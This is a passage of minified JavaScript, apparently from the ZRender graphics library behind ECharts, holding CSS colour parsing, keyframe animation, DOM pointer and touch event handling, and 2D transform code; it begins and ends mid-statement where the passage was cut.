,1],ghostwhite:[248,248,255,1],gold:[255,215,0,1],goldenrod:[218,165,32,1],gray:[128,128,128,1],green:[0,128,0,1],greenyellow:[173,255,47,1],grey:[128,128,128,1],honeydew:[240,255,240,1],hotpink:[255,105,180,1],indianred:[205,92,92,1],indigo:[75,0,130,1],ivory:[255,255,240,1],khaki:[240,230,140,1],lavender:[230,230,250,1],lavenderblush:[255,240,245,1],lawngreen:[124,252,0,1],lemonchiffon:[255,250,205,1],lightblue:[173,216,230,1],lightcoral:[240,128,128,1],lightcyan:[224,255,255,1],lightgoldenrodyellow:[250,250,210,1],lightgray:[211,211,211,1],lightgreen:[144,238,144,1],lightgrey:[211,211,211,1],lightpink:[255,182,193,1],lightsalmon:[255,160,122,1],lightseagreen:[32,178,170,1],lightskyblue:[135,206,250,1],lightslategray:[119,136,153,1],lightslategrey:[119,136,153,1],lightsteelblue:[176,196,222,1],lightyellow:[255,255,224,1],lime:[0,255,0,1],limegreen:[50,205,50,1],linen:[250,240,230,1],magenta:[255,0,255,1],maroon:[128,0,0,1],mediumaquamarine:[102,205,170,1],mediumblue:[0,0,205,1],mediumorchid:[186,85,211,1],mediumpurple:[147,112,219,1],mediumseagreen:[60,179,113,1],mediumslateblue:[123,104,238,1],mediumspringgreen:[0,250,154,1],mediumturquoise:[72,209,204,1],mediumvioletred:[199,21,133,1],midnightblue:[25,25,112,1],mintcream:[245,255,250,1],mistyrose:[255,228,225,1],moccasin:[255,228,181,1],navajowhite:[255,222,173,1],navy:[0,0,128,1],oldlace:[253,245,230,1],olive:[128,128,0,1],olivedrab:[107,142,35,1],orange:[255,165,0,1],orangered:[255,69,0,1],orchid:[218,112,214,1],palegoldenrod:[238,232,170,1],palegreen:[152,251,152,1],paleturquoise:[175,238,238,1],palevioletred:[219,112,147,1],papayawhip:[255,239,213,1],peachpuff:[255,218,185,1],peru:[205,133,63,1],pink:[255,192,203,1],plum:[221,160,221,1],powderblue:[176,224,230,1],purple:[128,0,128,1],red:[255,0,0,1],rosybrown:[188,143,143,1],royalblue:[65,105,225,1],saddlebrown:[139,69,19,1],salmon:[250,128,114,1],sandybrown:[244,164,96,1],seagreen:[46,139,87,1],seashell:[255,245,238,1],sienna:[160,82,45,1],silver:[192,192,192,1],skyblue:[135,206,235,1],slateblue:[106,90,205,1],slategray:[112,128,144,1],slategrey:[112,128,144,1],snow:[255,250,250,1],springgreen:[0,255,127,1],steelblue:[70,130,180,1],tan:[210,180,140,1],teal:[0,128,128,1],thistle:[216,191,216,1],tomato:[255,99,71,1],turquoise:[64,224,208,1],violet:[238,130,238,1],wheat:[245,222,179,1],white:[255,255,255,1],whitesmoke:[245,245,245,1],yellow:[255,255,0,1],yellowgreen:[154,205,50,1]};function ti(t){return(t=Math.round(t))<0?0:t>255?255:t}function ei(t){return t<0?0:t>1?1:t}function ni(t){var e=t;return e.length&&"%"===e.charAt(e.length-1)?ti(parseFloat(e)/100*255):ti(parseInt(e,10))}function ii(t){var e=t;return e.length&&"%"===e.charAt(e.length-1)?ei(parseFloat(e)/100):ei(parseFloat(e))}function ri(t,e,n){return n<0?n+=1:n>1&&(n-=1),6*n<1?t+(e-t)*n*6:2*n<1?e:3*n<2?t+(e-t)*(2/3-n)*6:t}function oi(t,e,n){return t+(e-t)*n}function ai(t,e,n,i,r){return t[0]=e,t[1]=n,t[2]=i,t[3]=r,t}function si(t,e){return t[0]=e[0],t[1]=e[1],t[2]=e[2],t[3]=e[3],t}var li=new Qn(20),ui=null;function ci(t,e){ui&&si(ui,e),ui=li.put(t,ui||e.slice())}function hi(t,e){if(t){e=e||[];var n=li.get(t);if(n)return si(e,n);var i=(t+="").replace(/ /g,"").toLowerCase();if(i in Jn)return si(e,Jn[i]),ci(t,e),e;var r,o=i.length;if("#"===i.charAt(0))return 4===o||5===o?(r=parseInt(i.slice(1,4),16))>=0&&r<=4095?(ai(e,(3840&r)>>4|(3840&r)>>8,240&r|(240&r)>>4,15&r|(15&r)<<4,5===o?parseInt(i.slice(4),16)/15:1),ci(t,e),e):void ai(e,0,0,0,1):7===o||9===o?(r=parseInt(i.slice(1,7),16))>=0&&r<=16777215?(ai(e,(16711680&r)>>16,(65280&r)>>8,255&r,9===o?parseInt(i.slice(7),16)/255:1),ci(t,e),e):void ai(e,0,0,0,1):void 0;var a=i.indexOf("("),s=i.indexOf(")");if(-1!==a&&s+1===o){var l=i.substr(0,a),u=i.substr(a+1,s-(a+1)).split(","),c=1;switch(l){case"rgba":if(4!==u.length)return 3===u.length?ai(e,+u[0],+u[1],+u[2],1):ai(e,0,0,0,1);c=ii(u.pop());case"rgb":return u.length>=3?(ai(e,ni(u[0]),ni(u[1]),ni(u[2]),3===u.length?c:ii(u[3])),ci(t,e),e):void ai(e,0,0,0,1);case"hsla":return 4!==u.length?void ai(e,0,0,0,1):(u[3]=ii(u[3]),pi(u,e),ci(t,e),e);case"hsl":return 3!==u.length?void ai(e,0,0,0,1):(pi(u,e),ci(t,e),e);default:return}}ai(e,0,0,0,1)}}function pi(t,e){var n=(parseFloat(t[0])%360+360)%360/360,i=ii(t[1]),r=ii(t[2]),o=r<=.5?r*(i+1):r+i-r*i,a=2*r-o;return ai(e=e||[],ti(255*ri(a,o,n+1/3)),ti(255*ri(a,o,n)),ti(255*ri(a,o,n-1/3)),1),4===t.length&&(e[3]=t[3]),e}function di(t,e){var n=hi(t);if(n){for(var i=0;i<3;i++)n[i]=e<0?n[i]*(1-e)|0:(255-n[i])*e+n[i]|0,n[i]>255?n[i]=255:n[i]<0&&(n[i]=0);return xi(n,4===n.length?"rgba":"rgb")}}function fi(t,e,n){if(e&&e.length&&t>=0&&t<=1){n=n||[];var i=t*(e.length-1),r=Math.floor(i),o=Math.ceil(i),a=e[r],s=e[o],l=i-r;return n[0]=ti(oi(a[0],s[0],l)),n[1]=ti(oi(a[1],s[1],l)),n[2]=ti(oi(a[2],s[2],l)),n[3]=ei(oi(a[3],s[3],l)),n}}var gi=fi;function vi(t,e,n){if(e&&e.length&&t>=0&&t<=1){var i=t*(e.length-1),r=Math.floor(i),o=Math.ceil(i),a=hi(e[r]),s=hi(e[o]),l=i-r,u=xi([ti(oi(a[0],s[0],l)),ti(oi(a[1],s[1],l)),ti(oi(a[2],s[2],l)),ei(oi(a[3],s[3],l))],"rgba");return n?{color:u,leftIndex:r,rightIndex:o,value:i}:u}}var yi=vi;function mi(t,e,n,i){var r,o=hi(t);if(t)return o=function(t){if(t){var e,n,i=t[0]/255,r=t[1]/255,o=t[2]/255,a=Math.min(i,r,o),s=Math.max(i,r,o),l=s-a,u=(s+a)/2;if(0===l)e=0,n=0;else{n=u<.5?l/(s+a):l/(2-s-a);var c=((s-i)/6+l/2)/l,h=((s-r)/6+l/2)/l,p=((s-o)/6+l/2)/l;i===s?e=p-h:r===s?e=1/3+c-p:o===s&&(e=2/3+h-c),e<0&&(e+=1),e>1&&(e-=1)}var d=[360*e,n,u];return null!=t[3]&&d.push(t[3]),d}}(o),null!=e&&(o[0]=(r=X(e)?e(o[0]):e,(r=Math.round(r))<0?0:r>360?360:r)),null!=n&&(o[1]=ii(X(n)?n(o[1]):n)),null!=i&&(o[2]=ii(X(i)?i(o[2]):i)),xi(pi(o),"rgba")}function _i(t,e){var n=hi(t);if(n&&null!=e)return n[3]=ei(e),xi(n,"rgba")}function xi(t,e){if(t&&t.length){var n=t[0]+","+t[1]+","+t[2];return"rgba"!==e&&"hsva"!==e&&"hsla"!==e||(n+=","+t[3]),e+"("+n+")"}}function bi(t,e){var n=hi(t);return n?(.299*n[0]+.587*n[1]+.114*n[2])*n[3]/255+(1-n[3])*e:0}var wi=new Qn(100);function Si(t){if(j(t)){var e=wi.get(t);return e||(e=di(t,-.1),wi.put(t,e)),e}if(et(t)){var n=A({},t);return n.colorStops=V(t.colorStops,function(t){return{offset:t.offset,color:di(t.color,-.1)}}),n}return t}var Mi=Object.freeze({__proto__:null,parseCssInt:ni,parseCssFloat:ii,parse:hi,lift:di,toHex:function(t){var e=hi(t);if(e)return((1<<24)+(e[0]<<16)+(e[1]<<8)+ +e[2]).toString(16).slice(1)},fastLerp:fi,fastMapToColor:gi,lerp:vi,mapToColor:yi,modifyHSL:mi,modifyAlpha:_i,stringify:xi,lum:bi,random:function(){return xi([Math.round(255*Math.random()),Math.round(255*Math.random()),Math.round(255*Math.random())],"rgb")},liftColor:Si}),Ti=Math.round;function ki(t){var e;if(t&&"transparent"!==t){if("string"==typeof t&&t.indexOf("rgba")>-1){var n=hi(t);n&&(t="rgb("+n[0]+","+n[1]+","+n[2]+")",e=n[3])}}else t="none";return{color:t,opacity:null==e?1:e}}var Ci=1e-4;function Ii(t){return t<Ci&&t>-1e-4}function Di(t){return Ti(1e3*t)/1e3}function Ai(t){return Ti(1e4*t)/1e4}var Pi={left:"start",right:"end",center:"middle",middle:"middle"};function Li(t){return t&&!!t.image}function Oi(t){return Li(t)||function(t){return t&&!!t.svgElement}(t)}function Ri(t){return"linear"===t.type}function Ni(t){return"radial"===t.type}function Bi(t){return t&&("linear"===t.type||"radial"===t.type)}function zi(t){return"url(#"+t+")"}function Ei(t){var e=t.getGlobalScale(),n=Math.max(e[0],e[1]);return Math.max(Math.ceil(Math.log(n)/Math.log(10)),1)}function Vi(t){var e=t.x||0,n=t.y||0,i=(t.rotation||0)*Mt,r=at(t.scaleX,1),o=at(t.scaleY,1),a=t.skewX||0,s=t.skewY||0,l=[];return(e||n)&&l.push("translate("+e+"px,"+n+"px)"),i&&l.push("rotate("+i+")"),1===r&&1===o||l.push("scale("+r+","+o+")"),(a||s)&&l.push("skew("+Ti(a*Mt)+"deg, "+Ti(s*Mt)+"deg)"),l.join(" ")}var Fi="undefined"!=typeof Buffer&&"function"==typeof Buffer.from?function(t){return Buffer.from(t).toString("base64")}:"function"==typeof btoa&&"function"==typeof unescape&&"function"==typeof encodeURIComponent?function(t){return btoa(unescape(encodeURIComponent(t)))}:function(t){return null},Hi=Array.prototype.slice;function Gi(t,e,n){return(e-t)*n+t}function Wi(t,e,n,i){for(var r=e.length,o=0;o<r;o++)t[o]=Gi(e[o],n[o],i);return t}function Ui(t,e,n,i){for(var r=e.length,o=0;o<r;o++)t[o]=e[o]+n[o]*i;return t}function Zi(t,e,n,i){for(var r=e.length,o=r&&e[0].length,a=0;a<r;a++){t[a]||(t[a]=[]);for(var s=0;s<o;s++)t[a][s]=e[a][s]+n[a][s]*i}return t}function Yi(t,e){for(var n=t.length,i=e.length,r=n>i?e:t,o=Math.min(n,i),a=r[o-1]||{color:[0,0,0,0],offset:0},s=o;s<Math.max(n,i);s++)r.push({offset:a.offset,color:a.color.slice()})}function Xi(t,e,n){var i=t,r=e;if(i.push&&r.push){var o=i.length,a=r.length;if(o!==a)if(o>a)i.length=a;else for(var s=o;s<a;s++)i.push(1===n?r[s]:Hi.call(r[s]));var l=i[0]&&i[0].length;for(s=0;s<i.length;s++)if(1===n)isNaN(i[s])&&(i[s]=r[s]);else for(var u=0;u<l;u++)isNaN(i[s][u])&&(i[s][u]=r[s][u])}}function ji(t){if(z(t)){var e=t.length;if(z(t[0])){for(var n=[],i=0;i<e;i++)n.push(Hi.call(t[i]));return n}return Hi.call(t)}return t}function qi(t){return t[0]=Math.floor(t[0])||0,t[1]=Math.floor(t[1])||0,t[2]=Math.floor(t[2])||0,t[3]=null==t[3]?1:t[3],"rgba("+t.join(",")+")"}function Ki(t){return 4===t||5===t}function $i(t){return 1===t||2===t}var Qi=[0,0,0,0],Ji=function(){function t(t){this.keyframes=[],this.discrete=!1,this._invalid=!1,this._needsSort=!1,this._lastFr=0,this._lastFrP=0,this.propName=t}return t.prototype.isFinished=function(){return this._finished},t.prototype.setFinished=function(){this._finished=!0,this._additiveTrack&&this._additiveTrack.setFinished()},t.prototype.needsAnimate=function(){return this.keyframes.length>=1},t.prototype.getAdditiveTrack=function(){return this._additiveTrack},t.prototype.addKeyframe=function(t,e,n){this._needsSort=!0;var i=this.keyframes,r=i.length,o=!1,a=6,s=e;if(z(e)){var l=function(t){return z(t&&t[0])?2:1}(e);a=l,(1===l&&!K(e[0])||2===l&&!K(e[0][0]))&&(o=!0)}else if(K(e)&&!rt(e))a=0;else if(j(e))if(isNaN(+e)){var u=hi(e);u&&(s=u,a=3)}else a=0;else if(et(e)){var c=A({},s);c.colorStops=V(e.colorStops,function(t){return{offset:t.offset,color:hi(t.color)}}),Ri(e)?a=4:Ni(e)&&(a=5),s=c}0===r?this.valType=a:a===this.valType&&6!==a||(o=!0),this.discrete=this.discrete||o;var h={time:t,value:s,rawValue:e,percent:0};return n&&(h.easing=n,h.easingFunc=X(n)?n:Mn[n]||jn(n)),i.push(h),h},t.prototype.prepare=function(t,e){var n=this.keyframes;this._needsSort&&n.sort(function(t,e){return t.time-e.time});for(var i=this.valType,r=n.length,o=n[r-1],a=this.discrete,s=$i(i),l=Ki(i),u=0;u<r;u++){var c=n[u],h=c.value,p=o.value;c.percent=c.time/t,a||(s&&u!==r-1?Xi(h,p,i):l&&Yi(h.colorStops,p.colorStops))}if(!a&&5!==i&&e&&this.needsAnimate()&&e.needsAnimate()&&i===e.valType&&!e._finished){this._additiveTrack=e;var d=n[0].value;for(u=0;u<r;u++)0===i?n[u].additiveValue=n[u].value-d:3===i?n[u].additiveValue=Ui([],n[u].value,d,-1):$i(i)&&(n[u].additiveValue=1===i?Ui([],n[u].value,d,-1):Zi([],n[u].value,d,-1))}},t.prototype.step=function(t,e){if(!this._finished){this._additiveTrack&&this._additiveTrack._finished&&(this._additiveTrack=null);var n,i,r,o=null!=this._additiveTrack,a=o?"additiveValue":"value",s=this.valType,l=this.keyframes,u=l.length,c=this.propName,h=3===s,p=this._lastFr,d=Math.min;if(1===u)i=r=l[0];else{if(e<0)n=0;else if(e<this._lastFrP){for(n=d(p+1,u-1);n>=0&&!(l[n].percent<=e);n--);n=d(n,u-2)}else{for(n=p;n<u&&!(l[n].percent>e);n++);n=d(n-1,u-2)}r=l[n+1],i=l[n]}if(i&&r){this._lastFr=n,this._lastFrP=e;var f=r.percent-i.percent,g=0===f?1:d((e-i.percent)/f,1);r.easingFunc&&(g=r.easingFunc(g));var v=o?this._additiveValue:h?Qi:t[c];if(!$i(s)&&!h||v||(v=this._additiveValue=[]),this.discrete)t[c]=g<1?i.rawValue:r.rawValue;else if($i(s))1===s?Wi(v,i[a],r[a],g):function(t,e,n,i){for(var r=e.length,o=r&&e[0].length,a=0;a<r;a++){t[a]||(t[a]=[]);for(var s=0;s<o;s++)t[a][s]=Gi(e[a][s],n[a][s],i)}}(v,i[a],r[a],g);else if(Ki(s)){var y=i[a],m=r[a],_=4===s;t[c]={type:_?"linear":"radial",x:Gi(y.x,m.x,g),y:Gi(y.y,m.y,g),colorStops:V(y.colorStops,function(t,e){var n=m.colorStops[e];return{offset:Gi(t.offset,n.offset,g),color:qi(Wi([],t.color,n.color,g))}}),global:m.global},_?(t[c].x2=Gi(y.x2,m.x2,g),t[c].y2=Gi(y.y2,m.y2,g)):t[c].r=Gi(y.r,m.r,g)}else if(h)Wi(v,i[a],r[a],g),o||(t[c]=qi(v));else{var x=Gi(i[a],r[a],g);o?this._additiveValue=x:t[c]=x}o&&this._addToTarget(t)}}},t.prototype._addToTarget=function(t){var e=this.valType,n=this.propName,i=this._additiveValue;0===e?t[n]=t[n]+i:3===e?(hi(t[n],Qi),Ui(Qi,Qi,i,1),t[n]=qi(Qi)):1===e?Ui(t[n],t[n],i,1):2===e&&Zi(t[n],t[n],i,1)},t}(),tr=function(){function t(t,e,n,i){this._tracks={},this._trackKeys=[],this._maxTime=0,this._started=0,this._clip=null,this._target=t,this._loop=e,e&&i?k("Can' use additive animation on looped animation."):(this._additiveAnimators=i,this._allowDiscrete=n)}return t.prototype.getMaxTime=function(){return this._maxTime},t.prototype.getDelay=function(){return this._delay},t.prototype.getLoop=function(){return this._loop},t.prototype.getTarget=function(){return this._target},t.prototype.changeTarget=function(t){this._target=t},t.prototype.when=function(t,e,n){return this.whenWithKeys(t,e,W(e),n)},t.prototype.whenWithKeys=function(t,e,n,i){for(var r=this._tracks,o=0;o<n.length;o++){var a=n[o],s=r[a];if(!s){s=r[a]=new Ji(a);var l=void 0,u=this._getAdditiveTrack(a);if(u){var c=u.keyframes,h=c[c.length-1];l=h&&h.value,3===u.valType&&l&&(l=qi(l))}else l=this._target[a];if(null==l)continue;t>0&&s.addKeyframe(0,ji(l),i),this._trackKeys.push(a)}s.addKeyframe(t,ji(e[a]),i)}return this._maxTime=Math.max(this._maxTime,t),this},t.prototype.pause=function(){this._clip.pause(),this._paused=!0},t.prototype.resume=function(){this._clip.resume(),this._paused=!1},t.prototype.isPaused=function(){return!!this._paused},t.prototype.duration=function(t){return this._maxTime=t,this._force=!0,this},t.prototype._doneCallback=function(){this._setTracksFinished(),this._clip=null;var t=this._doneCbs;if(t)for(var e=t.length,n=0;n<e;n++)t[n].call(this)},t.prototype._abortedCallback=function(){this._setTracksFinished();var t=this.animation,e=this._abortedCbs;if(t&&t.removeClip(this._clip),this._clip=null,e)for(var n=0;n<e.length;n++)e[n].call(this)},t.prototype._setTracksFinished=function(){for(var t=this._tracks,e=this._trackKeys,n=0;n<e.length;n++)t[e[n]].setFinished()},t.prototype._getAdditiveTrack=function(t){var e,n=this._additiveAnimators;if(n)for(var i=0;i<n.length;i++){var r=n[i].getTrack(t);r&&(e=r)}return e},t.prototype.start=function(t){if(!(this._started>0)){this._started=1;for(var e=this,n=[],i=this._maxTime||0,r=0;r<this._trackKeys.length;r++){var o=this._trackKeys[r],a=this._tracks[o],s=this._getAdditiveTrack(o),l=a.keyframes,u=l.length;if(a.prepare(i,s),a.needsAnimate())if(!this._allowDiscrete&&a.discrete){var c=l[u-1];c&&(e._target[a.propName]=c.rawValue),a.setFinished()}else n.push(a)}if(n.length||this._force){var h=new qn({life:i,loop:this._loop,delay:this._delay||0,onframe:function(t){e._started=2;var i=e._additiveAnimators;if(i){for(var r=!1,o=0;o<i.length;o++)if(i[o]._clip){r=!0;break}r||(e._additiveAnimators=null)}for(o=0;o<n.length;o++)n[o].step(e._target,t);var a=e._onframeCbs;if(a)for(o=0;o<a.length;o++)a[o](e._target,t)},ondestroy:function(){e._doneCallback()}});this._clip=h,this.animation&&this.animation.addClip(h),t&&h.setEasing(t)}else this._doneCallback();return this}},t.prototype.stop=function(t){if(this._clip){var e=this._clip;t&&e.onframe(1),this._abortedCallback()}},t.prototype.delay=function(t){return this._delay=t,this},t.prototype.during=function(t){return t&&(this._onframeCbs||(this._onframeCbs=[]),this._onframeCbs.push(t)),this},t.prototype.done=function(t){return t&&(this._doneCbs||(this._doneCbs=[]),this._doneCbs.push(t)),this},t.prototype.aborted=function(t){return t&&(this._abortedCbs||(this._abortedCbs=[]),this._abortedCbs.push(t)),this},t.prototype.getClip=function(){return this._clip},t.prototype.getTrack=function(t){return this._tracks[t]},t.prototype.getTracks=function(){var t=this;return V(this._trackKeys,function(e){return t._tracks[e]})},t.prototype.stopTracks=function(t,e){if(!t.length||!this._clip)return!0;for(var n=this._tracks,i=this._trackKeys,r=0;r<t.length;r++){var o=n[t[r]];o&&!o.isFinished()&&(e?o.step(this._target,1):1===this._started&&o.step(this._target,0),o.setFinished())}var a=!0;for(r=0;r<i.length;r++)if(!n[i[r]].isFinished()){a=!1;break}return a&&this._abortedCallback(),a},t.prototype.saveTo=function(t,e,n){if(t){e=e||this._trackKeys;for(var i=0;i<e.length;i++){var r=e[i],o=this._tracks[r];if(o&&!o.isFinished()){var a=o.keyframes,s=a[n?0:a.length-1];s&&(t[r]=ji(s.rawValue))}}}},t.prototype.__changeFinalValue=function(t,e){e=e||W(t);for(var n=0;n<e.length;n++){var i=e[n],r=this._tracks[i];if(r){var o=r.keyframes;if(o.length>1){var a=o.pop();r.addKeyframe(a.time,t[i]),r.prepare(this._maxTime,r.getAdditiveTrack())}}}},t}();function er(){return(new Date).getTime()}var nr,ir,rr=function(t){function e(e){var n=t.call(this)||this;return n._running=!1,n._time=0,n._pausedTime=0,n._pauseStart=0,n._paused=!1,e=e||{},n.stage=e.stage||{},n}return n(e,t),e.prototype.addClip=function(t){t.animation&&this.removeClip(t),this._head?(this._tail.next=t,t.prev=this._tail,t.next=null,this._tail=t):this._head=this._tail=t,t.animation=this},e.prototype.addAnimator=function(t){t.animation=this;var e=t.getClip();e&&this.addClip(e)},e.prototype.removeClip=function(t){if(t.animation){var e=t.prev,n=t.next;e?e.next=n:this._head=n,n?n.prev=e:this._tail=e,t.next=t.prev=t.animation=null}},e.prototype.removeAnimator=function(t){var e=t.getClip();e&&this.removeClip(e),t.animation=null},e.prototype.update=function(t){for(var e=er()-this._pausedTime,n=e-this._time,i=this._head;i;){var r=i.next;i.step(e,n)?(i.ondestroy(),this.removeClip(i),i=r):i=r}this._time=e,t||(this.trigger("frame",n),this.stage.update&&this.stage.update())},e.prototype._startLoop=function(){var t=this;this._running=!0,Sn(function e(){t._running&&(Sn(e),!t._paused&&t.update())})},e.prototype.start=function(){this._running||(this._time=er(),this._pausedTime=0,this._startLoop())},e.prototype.stop=function(){this._running=!1},e.prototype.pause=function(){this._paused||(this._pauseStart=er(),this._paused=!0)},e.prototype.resume=function(){this._paused&&(this._pausedTime+=er()-this._pauseStart,this._paused=!1)},e.prototype.clear=function(){for(var t=this._head;t;){var e=t.next;t.prev=t.next=t.animation=null,t=e}this._head=this._tail=null},e.prototype.isFinished=function(){return null==this._head},e.prototype.animate=function(t,e){e=e||{},this.start();var n=new tr(t,e.loop);return this.addAnimator(n),n},e}(Kt),or=r.domSupported,ar=(ir={pointerdown:1,pointerup:1,pointermove:1,pointerout:1},{mouse:nr=["click","dblclick","mousewheel","wheel","mouseout","mouseup","mousedown","mousemove","contextmenu"],touch:["touchstart","touchend","touchmove"],pointer:V(nr,function(t){var e=t.replace("mouse","pointer");return ir.hasOwnProperty(e)?e:t})}),sr=["mousemove","mouseup"],lr=["pointermove","pointerup"],ur=!1;function cr(t){var e=t.pointerType;return"pen"===e||"touch"===e}function hr(t){t&&(t.zrByTouch=!0)}function pr(t,e){for(var n=e,i=!1;n&&9!==n.nodeType&&!(i=n.domBelongToZr||n!==e&&n===t.painterRoot);)n=n.parentNode;return i}var dr=function(t,e){this.stopPropagation=St,this.stopImmediatePropagation=St,this.preventDefault=St,this.type=e.type,this.target=this.currentTarget=t.dom,this.pointerType=e.pointerType,this.clientX=e.clientX,this.clientY=e.clientY},fr={mousedown:function(t){t=de(this.dom,t),this.__mayPointerCapture=[t.zrX,t.zrY],this.trigger("mousedown",t)},mousemove:function(t){t=de(this.dom,t);var e=this.__mayPointerCapture;!e||t.zrX===e[0]&&t.zrY===e[1]||this.__togglePointerCapture(!0),this.trigger("mousemove",t)},mouseup:function(t){t=de(this.dom,t),this.__togglePointerCapture(!1),this.trigger("mouseup",t)},mouseout:function(t){pr(this,(t=de(this.dom,t)).toElement||t.relatedTarget)||(this.__pointerCapturing&&(t.zrEventControl="no_globalout"),this.trigger("mouseout",t))},wheel:function(t){ur=!0,t=de(this.dom,t),this.trigger("mousewheel",t)},mousewheel:function(t){ur||(t=de(this.dom,t),this.trigger("mousewheel",t))},touchstart:function(t){hr(t=de(this.dom,t)),this.__lastTouchMoment=new Date,this.handler.processGesture(t,"start"),fr.mousemove.call(this,t),fr.mousedown.call(this,t)},touchmove:function(t){hr(t=de(this.dom,t)),this.handler.processGesture(t,"change"),fr.mousemove.call(this,t)},touchend:function(t){hr(t=de(this.dom,t)),this.handler.processGesture(t,"end"),fr.mouseup.call(this,t),+new Date-+this.__lastTouchMoment<300&&fr.click.call(this,t)},pointerdown:function(t){fr.mousedown.call(this,t)},pointermove:function(t){cr(t)||fr.mousemove.call(this,t)},pointerup:function(t){fr.mouseup.call(this,t)},pointerout:function(t){cr(t)||fr.mouseout.call(this,t)}};E(["click","dblclick","contextmenu"],function(t){fr[t]=function(e){e=de(this.dom,e),this.trigger(t,e)}});var gr={pointermove:function(t){cr(t)||gr.mousemove.call(this,t)},pointerup:function(t){gr.mouseup.call(this,t)},mousemove:function(t){this.trigger("mousemove",t)},mouseup:function(t){var e=this.__pointerCapturing;this.__togglePointerCapture(!1),this.trigger("mouseup",t),e&&(t.zrEventControl="only_globalout",this.trigger("mouseout",t))}};function vr(t,e){var n=e.domHandlers;r.pointerEventsSupported?E(ar.pointer,function(i){mr(e,i,function(e){n[i].call(t,e)})}):(r.touchEventsSupported&&E(ar.touch,function(i){mr(e,i,function(r){n[i].call(t,r),function(t){t.touching=!0,null!=t.touchTimer&&(clearTimeout(t.touchTimer),t.touchTimer=null),t.touchTimer=setTimeout(function(){t.touching=!1,t.touchTimer=null},700)}(e)})}),E(ar.mouse,function(i){mr(e,i,function(r){r=pe(r),e.touching||n[i].call(t,r)})}))}function yr(t,e){function n(n){mr(e,n,function(i){i=pe(i),pr(t,i.target)||(i=function(t,e){return de(t.dom,new dr(t,e),!0)}(t,i),e.domHandlers[n].call(t,i))},{capture:!0})}r.pointerEventsSupported?E(lr,n):r.touchEventsSupported||E(sr,n)}function mr(t,e,n,i){t.mounted[e]=n,t.listenerOpts[e]=i,fe(t.domTarget,e,n,i)}function _r(t){var e=t.mounted;for(var n in e)e.hasOwnProperty(n)&&ge(t.domTarget,n,e[n],t.listenerOpts[n]);t.mounted={}}var xr=function(t,e){this.mounted={},this.listenerOpts={},this.touching=!1,this.domTarget=t,this.domHandlers=e},br=function(t){function e(e,n){var i=t.call(this)||this;return i.__pointerCapturing=!1,i.dom=e,i.painterRoot=n,i._localHandlerScope=new xr(e,fr),or&&(i._globalHandlerScope=new xr(document,gr)),vr(i,i._localHandlerScope),i}return n(e,t),e.prototype.dispose=function(){_r(this._localHandlerScope),or&&_r(this._globalHandlerScope)},e.prototype.setCursor=function(t){this.dom.style&&(this.dom.style.cursor=t||"default")},e.prototype.__togglePointerCapture=function(t){if(this.__mayPointerCapture=null,or&&+this.__pointerCapturing^+t){this.__pointerCapturing=t;var e=this._globalHandlerScope;t?yr(this,e):_r(e)}},e}(Kt),wr=1;r.hasGlobalWindow&&(wr=Math.max(window.devicePixelRatio||window.screen&&window.screen.deviceXDPI/window.screen.logicalXDPI||1,1));var Sr=wr,Mr="#333",Tr="#ccc",kr=we,Cr=5e-5;function Ir(t){return t>Cr||t<-5e-5}var Dr=[],Ar=[],Pr=[1,0,0,1,0,0],Lr=Math.abs,Or=function(){function t(){}var e;return t.prototype.getLocalTransform=function(t){return Rr(this,t)},t.prototype.setPosition=function(t){this.x=t[0],this.y=t[1]},t.prototype.setScale=function(t){this.scaleX=t[0],this.scaleY=t[1]},t.prototype.setSkew=function(t){this.skewX=t[0],this.skewY=t[1]},t.prototype.setOrigin=function(t){this.originX=t[0],this.originY=t[1]},t.prototype.needLocalTransform=function(){return Ir(this.rotation)||Ir(this.x)||Ir(this.y)||Ir(this.scaleX-1)||Ir(this.scaleY-1)||Ir(this.skewX)||Ir(this.skewY)},t.prototype.updateTransform=function(){var t=this.parent&&this.parent.transform,e=this.needLocalTransform(),n=this.transform;e||t?(n=n||[1,0,0,1,0,0],e?this.getLocalTransform(n):kr(n),t&&(e?Me(n,t,n):Se(n,t)),this.transform=n,this._resolveGlobalScaleRatio(n),this.invTransform=this.invTransform||[1,0,0,1,0,0],Ie(this.invTransform,n)):n&&(kr(n),this.invTransform=null)},t.prototype._resolveGlobalScaleRatio=function(t){var e=this.globalScaleRatio;if(null!=e&&1!==e){this.getGlobalScale(Dr);var n=Dr[0]<0?-1:1,i=Dr[1]<0?-1:1,r=((Dr[0]-n)*e+n)/Dr[0]||0,o=((Dr[1]-i)*e+i)/Dr[1]||0;t[0]*=r,t[1]*=r,t[2]*=o,t[3]*=o}},t.prototype.getComputedTransform=function(){for(var t=this,e=[];t;)e.push(t),t=t.parent;for(;t=e.pop();)t.updateTransform();return this.transform},t.prototype.setLocalTransform=function(t){if(t){var e=t[0]*t[0]+t[1]*t[1],n=t[2]*t[2]+t[3]*t[3],i=Math.atan2(t[1],t[0]),r=Math.PI/2+i-Math.atan2(t[3],t[2]);n=Math.sqrt(n)*Math.cos(r),e=Math.sqrt(e),this.skewX=r,this.skewY=0,this.rotation=-i,this.x=+t[4],this.y=+t[5],this.scaleX=e,this.scaleY=n,this.originX=0,this.originY=0}},t.prototype.decomposeTransform=function(){if(this.transform){var t=this.parent,e=this.transform;t&&t.transform&&(t.invTransform=t.invTransform||[1,0,0,1,0,0],Me(Ar,t.invTransform,e),e=Ar);var n=this.originX,i=this.originY;(n||i)&&(Pr[4]=n,Pr[5]=i,Me(Ar,e,Pr),Ar[4]-=n,Ar[5]-=i,e=Ar),this.setLocalTransform(e)}},t.prototype.getGlobalScale=function(t){var e=this.transform;return t=t||[],e?(t[0]=Math.sqrt(e[0]*e[0]+e[1]*e[1]),t[1]=Math.sqrt(e[2]*e[2]+e[3]*e[3]),e[0]<0&&(t[0]=-t[0]),e[3]<0&&(t[1]=-t[1]),t):(t[0]=1,t[1]=1,t)},t.prototype.transformCoordToLocal=function(t,e){var n=[t,e],i=this.invTransform;return i&&Ut(n,n,i),n},t.prototype.transformCoordToGlobal=function(t,e){var n=[t,e],i=this.transform;return i&&Ut(n,n,i),n},t.prototype.getLineScale=function(){var t=this.transform;return t&&Lr(t[0]-1)>1e-10&&Lr(t[3]-1)>1e-10?Math.sqrt(Lr(t[0]*t[3]-t[2]*t[1])):1},t.prototype.copyTransform=function(t){Er(this,t)},t.getLocalTransform=function(t,e){e=e||[];var n=t.originX||0,i=t.originY||0,r=t.scaleX,o=t.scaleY,a=t.anchorX,s=t.anchorY,l=t.rotation||0,u=t.x,c=t.y,h=t.skewX?Math.tan(t.skewX):0,p=t.skewY?Math.tan(-t.skewY):0;if(n||i||a||s){var 